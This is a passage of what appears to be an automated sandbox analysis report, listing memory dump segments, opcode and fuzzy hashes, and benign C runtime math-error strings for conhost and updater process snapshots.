                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4064033741
                                                                      • Opcode ID: a6e05d0719d9a226eb1572a5a872eae5caac3b2fed66a295f5c7032a268e0805
                                                                      • Instruction ID: 8d6308b0a2ad8cada52f579dcfd85a09314276aeb4e4638d50abcf555864c8be
                                                                      • Opcode Fuzzy Hash: a6e05d0719d9a226eb1572a5a872eae5caac3b2fed66a295f5c7032a268e0805
                                                                      • Instruction Fuzzy Hash: 15F04427828F4482D2119F58E4002AFF770FF9A755F605726EBC926564DF2DD502C714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2187435201
                                                                      • Opcode ID: c9ed7c2e3d482160450769c1ff0e72cefc97edc8508946716ac543fe13f5e388
                                                                      • Instruction ID: fbd30f60990c56cab345db7508cf3a2b5d58b5a4942409cefaa748770c9cc93d
                                                                      • Opcode Fuzzy Hash: c9ed7c2e3d482160450769c1ff0e72cefc97edc8508946716ac543fe13f5e388
                                                                      • Instruction Fuzzy Hash: B2F04F27828F8482D2119F18E4002AFF770FF9A799F605726EBC9265A4EF2DE502C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4283191376
                                                                      • Opcode ID: 3199eb5275f02423fcae51ffbe391b0cbbf840796bd1e3838004dfcebcb03dfa
                                                                      • Instruction ID: 4407c5e11a9b4781360f17395376c225d29bc11d6c9135b4f344c095d0c130d7
                                                                      • Opcode Fuzzy Hash: 3199eb5275f02423fcae51ffbe391b0cbbf840796bd1e3838004dfcebcb03dfa
                                                                      • Instruction Fuzzy Hash: 13F04F27828F8482D2119F18E4002AFF770FF9A799F605726EBC9265A4EF2DE502C714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4273532761
                                                                      • Opcode ID: d235f4f20999ea0141b5c37e71e27d7b56d2e9f6ab22c2758905faa18072636f
                                                                      • Instruction ID: 003e8b1402837f60a5815f50edc164a4e7da54277b42a5aaa1d1a06c577b102e
                                                                      • Opcode Fuzzy Hash: d235f4f20999ea0141b5c37e71e27d7b56d2e9f6ab22c2758905faa18072636f
                                                                      • Instruction Fuzzy Hash: 7AF06227828F8482D2119F18E4002AFF770FF9E799F605726EBC9265A4EF2DE502C714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmp
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2468659920
                                                                      • Opcode ID: dea26e7da8c6239b8ab8b855cccdcf6a6d5c3b914d4e9b93f95941bea0719a5a
                                                                      • Instruction ID: 289a9f3e5b8fa69f67f104756241ccda58c83f4f388b298dfc7c5cd85aa4be4e
                                                                      • Opcode Fuzzy Hash: dea26e7da8c6239b8ab8b855cccdcf6a6d5c3b914d4e9b93f95941bea0719a5a
                                                                      • Instruction Fuzzy Hash: 3EF06D27818F8482D2019F18E4002AFF770FF9E799F605726EBC8266A4EF2DD502C704
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1710894177.00007FF602811000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF602810000, based on PE: true
                                                                      • Associated: 00000018.00000002.1710867337.00007FF602810000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1710920737.00007FF602816000.00000008.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1711013736.00007FF60281E000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1711411987.00007FF602822000.00000008.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1712285483.00007FF602D85000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1712322067.00007FF602D87000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1712346842.00007FF602D8B000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1712369317.00007FF602D90000.00000008.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000018.00000002.1712394094.00007FF602D91000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ff602810000_updater.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction ID: 6a7c32b4ee99d95e1c8dc8cb70a9b853a9799724de73b284ed21fa762e9c398f
                                                                      • Opcode Fuzzy Hash: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction Fuzzy Hash: 3BB09264A2420584E3002B1198412682A206F14B04FA02120C50C82396CEEC94814720